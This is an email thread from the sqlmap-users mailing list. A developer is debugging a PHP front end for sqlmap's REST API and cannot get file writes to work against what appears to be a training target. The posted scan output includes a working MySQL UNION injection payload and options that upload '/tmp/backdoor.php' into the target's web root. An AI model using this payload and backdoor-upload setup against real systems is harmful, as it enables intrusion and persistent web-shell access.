I think you meant to reply to the list.
Take a look at the log and data endpoints, not just the log endpoint. Might
give mor information.
Sent from a phone
> On Mar 2, 2015, at 7:14 PM, Johnathon Doe <hood3dro...@gmail.com> wrote:
>
> Quick update: the Proxy logs show sqlmap doing the verification step to
> confirm file size after the writing, so I think the API may be off a tad bit
> and failing to report back status properly.
>
>> On Mon, Mar 2, 2015 at 7:09 PM, Johnathon Doe <hood3dro...@gmail.com> wrote:
>> OK, so I tested it through Burp to see what was going on. It is indeed
>> writing the file and working successfully, however the API itself seems to
>> be cutting off the log data or something odd is happening that I can't
>> figure out.
>>
>> It also returns no status for the file write action in the scan data
>> response array, so I have no way to really verify if things were successful
>> or not other than possibly writing a additional HTTP GET request from the
>> front end to check and confirm new file exists. Seems like the API should
>> report back status though and avoid that entirely. Any thoughts or ideas?
>>
>>
>> Log snippet (check banner and try to write file):
>> ...
>> [INFO] [19:08:56] testing MySQL
>> [INFO] [19:08:56] confirming MySQL
>> [INFO] [19:08:56] the back-end DBMS is MySQL
>> [INFO] [19:08:56] fetching banner
>> [INFO] [19:08:57] fingerprinting the back-end DBMS operating system
>> [INFO] [19:08:57] the back-end DBMS operating system is Linux
>> [WARNING] [19:08:57] expect junk characters inside the file as a leftover
>> from UNION query
>> => just stops here, seemingly cut off...
>>
>>
>>
>> And the full scan data response array:
>> Array
>> (
>> [0] => Array
>> (
>> [status] => 1
>> [type] => 0
>> [value] => Array
>> (
>> [0] => Array
>> (
>> [dbms] => MySQL
>> [suffix] =>
>> [clause] => Array
>> (
>> [0] => 1
>> [1] => 2
>> [2] => 3
>> [3] => 4
>> [4] => 5
>> )
>>
>> [ptype] => 1
>> [dbms_version] =>
>> [prefix] =>
>> [place] => GET
>> [os] =>
>> [conf] => Array
>> (
>> [string] =>
>> [notString] =>
>> [titles] =>
>> [regexp] =>
>> [textOnly] =>
>> [optimize] =>
>> )
>>
>> [parameter] => tainted_id
>> [data] => Array
>> (
>> [3] => Array
>> (
>> [comment] => #
>> [matchRatio] => 0.303
>> [title] => MySQL UNION query
>> (NULL) - 1 to 10 columns
>> [templatePayload] =>
>> [vector] => Array
>> (
>> [0] => 3
>> [1] => 4
>> [2] => #
>> [3] =>
>> [4] =>
>> [5] => NULL
>> [6] => 1
>> [7] =>
>> [8] =>
>> )
>>
>> [where] => 1
>> [payload] => tainted_id=01 UNION
>> ALL SELECT
>> NULL,NULL,NULL,CONCAT(0x71707a7171,0x676a476a697a484a6442,0x716b627871)#&tainted_cost=10.00
>> )
>>
>> )
>>
>> )
>>
>> )
>>
>> )
>>
>> [1] => Array
>> (
>> [status] => 1
>> [type] => 2
>> [value] => 5.0.95
>> )
>>
>> )
>>
>>
>>
>> Configuration Options Set for Scan:
>> Array
>> (
>> [options] => Array
>> (
>> [osShell] =>
>> [getUsers] =>
>> [getPasswordHashes] =>
>> [excludeSysDbs] =>
>> [uChar] =>
>> [regData] =>
>> [cpuThrottle] => 5
>> [prefix] =>
>> [code] =>
>> [googlePage] => 1
>> [skip] =>
>> [query] =>
>> [randomAgent] => true
>> [osPwn] =>
>> [authType] =>
>> [crawlDepth] =>
>> [requestFile] =>
>> [predictOutput] =>
>> [wizard] =>
>> [stopFail] =>
>> [forms] =>
>> [taskid] => 5033f157cc662932
>> [pivotColumn] =>
>> [dropSetCookie] =>
>> [smart] =>
>> [risk] => 2
>> [sqlFile] =>
>> [rParam] =>
>> [getCurrentUser] =>
>> [notString] =>
>> [getRoles] =>
>> [getPrivileges] =>
>> [testParameter] =>
>> [tbl] =>
>> [charset] =>
>> [trafficFile] =>
>> [osSmb] =>
>> [level] => 3
>> [secondOrder] =>
>> [outputDir] =>
>> [timeout] => 30
>> [firstChar] =>
>> [torPort] =>
>> [regRead] =>
>> [binaryFields] =>
>> [checkTor] =>
>> [commonTables] =>
>> [direct] =>
>> [saFreq] => 0
>> [tmpPath] =>
>> [titles] =>
>> [getSchema] =>
>> [identifyWaf] =>
>> [paramDel] =>
>> [regKey] =>
>> [limitStart] =>
>> [flushSession] =>
>> [loadCookies] =>
>> [dnsName] =>
>> [csvDel] => ,
>> [method] => GET
>> [osBof] =>
>> [invalidLogical] =>
>> [getCurrentDb] =>
>> [hexConvert] =>
>> [proxyFile] =>
>> [answers] =>
>> [host] =>
>> [dependencies] =>
>> [cookie] =>
>> [proxy] => http://127.0.0.1:8080
>> [regType] =>
>> [optimize] =>
>> [limitStop] =>
>> [mnemonics] =>
>> [uFrom] =>
>> [noCast] =>
>> [testFilter] =>
>> [eta] =>
>> [csrfToken] =>
>> [threads] => 1
>> [logFile] =>
>> [os] =>
>> [col] =>
>> [rFile] =>
>> [proxyCred] =>
>> [verbose] => 1
>> [isDba] =>
>> [updateAll] =>
>> [privEsc] =>
>> [forceDns] =>
>> [getAll] =>
>> [api] => 1
>> [url] =>
>> http://192.168.1.10/training/sqli/sqli1.php?tainted_id=01&tainted_cost=10.00
>> [invalidBignum] =>
>> [regexp] =>
>> [getDbs] =>
>> [freshQueries] =>
>> [uCols] =>
>> [smokeTest] =>
>> [wFile] => /tmp/backdoor.php
>> [udfInject] =>
>> [invalidString] =>
>> [tor] =>
>> [forceSSL] =>
>> [ignore401] =>
>> [beep] =>
>> [saveCmdline] =>
>> [configFile] =>
>> [scope] =>
>> [dumpAll] =>
>> [torType] => HTTP
>> [regVal] =>
>> [dummy] =>
>> [search] =>
>> [skipUrlEncode] =>
>> [referer] =>
>> [liveTest] =>
>> [purgeOutput] =>
>> [retries] => 3
>> [authPrivate] =>
>> [extensiveFp] =>
>> [dumpTable] =>
>> [database] => /tmp/sqlmapipc-xZHnRg
>> [batch] => 1
>> [headers] =>
>> [authCred] =>
>> [osCmd] =>
>> [suffix] =>
>> [dbmsCred] =>
>> [regDel] =>
>> [shLib] =>
>> [sitemapUrl] =>
>> [timeSec] => 5
>> [msfPath] =>
>> [noEscape] =>
>> [getHostname] =>
>> [sessionFile] =>
>> [disableColoring] => 1
>> [getTables] =>
>> [agent] =>
>> [lastChar] =>
>> [string] =>
>> [dbms] =>
>> [dumpWhere] =>
>> [tamper] =>
>> [hpp] =>
>> [runCase] =>
>> [delay] => 0
>> [evalCode] =>
>> [cleanup] =>
>> [csrfUrl] =>
>> [getBanner] => true
>> [profile] =>
>> [getComments] =>
>> [bulkFile] =>
>> [safUrl] =>
>> [db] =>
>> [excludeCol] =>
>> [dumpFormat] => CSV
>> [alert] =>
>> [nullConnection] =>
>> [user] =>
>> [parseErrors] =>
>> [getCount] =>
>> [dFile] => /var/www/html/images/69.php
>> [data] =>
>> [regAdd] =>
>> [ignoreProxy] =>
>> [getColumns] =>
>> [mobile] =>
>> [googleDork] =>
>> [sqlShell] =>
>> [pageRank] =>
>> [tech] => U
>> [textOnly] =>
>> [cookieDel] =>
>> [commonColumns] =>
>> [keepAlive] =>
>> )
>>
>> [success] => 1
>> )
>>
>>> On Mon, Mar 2, 2015 at 6:32 PM, Johnathon Doe <hood3dro...@gmail.com> wrote:
>>> for some reason I hadn't thought of that, that is a great idea! will report
>>> back in a bit....
>>>
>>>> On Mon, Mar 2, 2015 at 6:24 PM, Brandon Perry <bperry.volat...@gmail.com>
>>>> wrote:
>>>> Can you set the proxy argument to go through burp suite to see exactly
>>>> what sqlmap is sending when those options are set?
>>>>
>>>> Sent from a phone
>>>>
>>>> > On Mar 2, 2015, at 6:21 PM, Johnathon Doe <hood3dro...@gmail.com> wrote:
>>>> >
>>>> > I am working on PHP front-end to leverage the REST API to drive
>>>> > functionality, having some issues working in a few of the advanced
>>>> > features - mostly file write. I was wondering if anyone could verify the
>>>> > wFile & dFile config options when set will trigger a file write action.
>>>> >
>>>> > I have managed to get the osCmd option to successfully write a file to
>>>> > the target, but I can't seem to get the normal --file-write --file-dest
>>>> > options to work. The osCmd option generally takes me passing in the
>>>> > prompt answers via the answer configuration option.
>>>> >
>>>> > I assumed if i set the values for the wFile & dFile options it would
>>>> > trigger the file write, but nothing seems to be happening. I dump the
>>>> > list of options currently configured and shows both options set with
>>>> > proper paths (same ones that work when provided to osCmd via answers to
>>>> > prompt). The logs don't show any errors and it just seems to end right
>>>> > where I would expect it to try the file writing. Is there a third option
>>>> > that needs to be set that I am perhaps missing? Any help you guys can
>>>> > provide is greatly appreciated!
>>>> >
>>>> > Also note: when i put in a bad path (just to test), it does seem to
>>>> > trigger the error for finding local file (wFile) so its doing something
>>>> > with these variables, but still seems like I'm missing something....
>>>> >
>>>> > Thanks,
>>>> > HR
>>>> > ------------------------------------------------------------------------------
>>>> > Dive into the World of Parallel Programming The Go Parallel Website,
>>>> > sponsored
>>>> > by Intel and developed in partnership with Slashdot Media, is your hub
>>>> > for all
>>>> > things parallel software development, from weekly thought leadership
>>>> > blogs to
>>>> > news, videos, case studies, tutorials and more. Take a look and join the
>>>> > conversation now. http://goparallel.sourceforge.net/
>>>> > _______________________________________________
>>>> > sqlmap-users mailing list
>>>> > sqlmap-users@lists.sourceforge.net
>>>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
------------------------------------------------------------------------------
Dive into the World of Parallel Programming The Go Parallel Website, sponsored
by Intel and developed in partnership with Slashdot Media, is your hub for all
things parallel software development, from weekly thought leadership blogs to
news, videos, case studies, tutorials and more. Take a look and join the
conversation now. http://goparallel.sourceforge.net/
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
